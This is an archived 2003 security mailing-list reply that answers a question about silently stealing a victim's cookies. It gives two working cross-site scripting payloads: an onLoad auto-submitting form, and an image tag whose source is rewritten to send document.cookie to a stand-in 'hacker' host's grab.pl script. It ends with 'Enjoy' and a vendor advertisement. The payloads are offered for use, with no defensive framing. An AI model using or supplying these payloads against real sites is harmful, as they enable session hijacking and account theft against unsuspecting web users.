On Sun, 2003-04-13 at 09:33, Indian Tiger wrote: > One way of transferring cookie information from the victim’s machine to > attacker’s machine is to create a hidden filed & then transfer cookie > information to that hidden field & then post (submit) this hidden field to web > site of attacker. But this require interaction of victim, as victim must click > on submit button to post this data to attacker’s site, which is not a good > idea, the data should be transferred without knowledge of victim. I'm not sure I well understand your problem but you can : - use Javascript to sumbit a form <body onLoad=document.forms.upld.submit();> <form method="post" name="upld" action="http://hacker/cgi-bin/grab.pl"> <input ....> </form> - transfer the cookie via a IMG tag and some Javascript <img name="owned" src="http://hacker/cool.gif"> <script> document.owned.src="http://hacker/cgi-bin/grab.pl?data=" +escape(document.cookie); </script> That's just some of the many ways to steal cookies. Enjoy ... -- Nicolas Gregoire ----- Consultant en Sécurité des Systèmes d'Information ngregoireat_private ------[ ExaProbe ]------ http://www.exaprobe.com/ PGP KeyID:CA61B44F FingerPrint:1CC647FF1A55664BA2D2AFDACA6A21DACA61B44F -------------------------------------------------------------- Costs are climbing and complaints are rising as SPAM overloads your e-mail servers and Inboxes SurfControl E-mail Filter puts the brakes on spam & viruses and gives you the reports to prove it. http://www.securityfocus.com/SurfControl-pen-test2 Download a free trial and see just what's going in and out of your organization. --------------------------------------------------------------
This archive was generated by hypermail 2b30 : Mon Apr 14 2003 - 10:53:23 PDT